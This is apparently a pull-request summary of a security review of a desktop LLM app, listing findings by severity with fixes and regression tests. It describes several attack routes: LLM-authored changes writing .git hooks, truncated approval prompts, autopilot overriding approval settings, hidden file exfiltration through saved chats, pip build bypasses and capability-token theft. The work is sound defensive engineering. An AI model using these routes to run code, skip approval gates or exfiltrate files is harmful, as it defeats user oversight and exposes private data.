A focused security/vulnerability pass over the desktop app's real trust boundaries (documented in backend/auth.py and the ADR-004/005 comments): a same-user local process, prompt-injected LLM content, hostile data on disk, hostile network responses, and the LLM-authored code the app executes. Each finding below was reproduced against the actual code and fixed with a regression test that was confirmed to fail on the pre-fix code (revert-verified via file copies, never git stash).

## High severity

- **Gitlink `.git` write → code execution.** An LLM-authored Gitlink change set could write `.git/hooks/pre-commit` or a `core.fsmonitor`/alias line into `.git/config` - inside `local_root`, so every containment guard passed it - giving arbitrary code execution on the user's next git command. `.git` is now refused categorically at the path chokepoint.
- **Code Sandbox `--only-binary` bypass.** A manifest could re-enable hostile sdist build backends via `--no-binary :all:` (applied by pip after the CLI flag), or smuggle direct-URL/editable references through a nested `-r`/`-c` file, or pass source-build-only options. Proven against real pip; those lines are now refused when source builds are off.
- **Py-Coder approval prompt truncated the code** at 400 chars - everything after ran unseen. Now disclosed in full.
- **Autopilot ignored `approval="always"`** and auto-approved `graph.delete_node`. Scope fit is now necessary but not sufficient. (This also closed the medium plugin finding below, since plugin tools all register `approval="always"`.)
- **Backend port hijack → capability-token theft.** The loopback listener used `SO_REUSEADDR` with a probe-close-rebind sequence; a same-user process could bind the port first and silently receive the WebView2's requests, each carrying the per-launch token. Bound once, exclusively (`SO_EXCLUSIVEADDRUSE` on Windows), and handed to uvicorn.
- **Saved-chat `audio_file` path exfil.** A persisted chat could carry `{"type":"audio_file","path":"<any local file>"}` - invisible in the UI - read and uploaded to the provider on the next turn. Neutralized to an inert placeholder on load.

## Medium severity

- **Hostile `session.dat` crashed the app at boot** (non-object root, or a list `api_models`). Now treated as corruption and backed up.
- **`NaN`/`Infinity` in a saved chat wedged the scene channel** (invalid JSON the SPA drops). Sanitized at the restore-coercion layer.
- **Provider image-URL SSRF** (`file://` local read, private-IP) - now validated through the audited web_research `FetchPolicy`.
- **One bad MCP server crashed the whole Builder registry** (a `ValueError` from duplicate tool names escaped and leaked the subprocess). Now isolated per server.
- **Research approval prompt hid the outbound query** sent to the external search provider. Now disclosed.
- **Autopilot auto-approved plugin tools by the plugin's self-declared scope** - closed by the `approval="always"` fix above; pinned with a plugin-specific regression test.

## Low severity

- **Third-party plugins could use the first-party-only builtin hatch** (`register_builtin_plugin`) to run un-gated, consent-invisible picker actions. Restricted to the 8 first-party plugin ids.

## Deliberately not addressed (need a product/architecture decision)

- Plugin module top-level code runs at discovery before any grant. Per the finding's own note this is a consent-model gap, not a privilege escalation (writing to `plugins/` already equals writing to `backend/`); closing it is an architectural change to plugin loading.
- Frontend: no `img-src` CSP on markdown/LLM output (silent image-based exfil); HTML-node `srcdoc` can read the capability token via `baseURI`.
- MCP: `approval="auto"` is invisible in the Settings UI; untrusted MCP tool descriptions are fed uncapped into the model context.
- A few low-severity hardening items (Windows file DACLs, log-file permissions, unbounded MCP log records).

## Test plan
- [x] `python -m pytest -q` from repo root: green
- [x] `python -m ruff check .`: clean
- [x] Every fix has a regression test confirmed to fail against the pre-fix code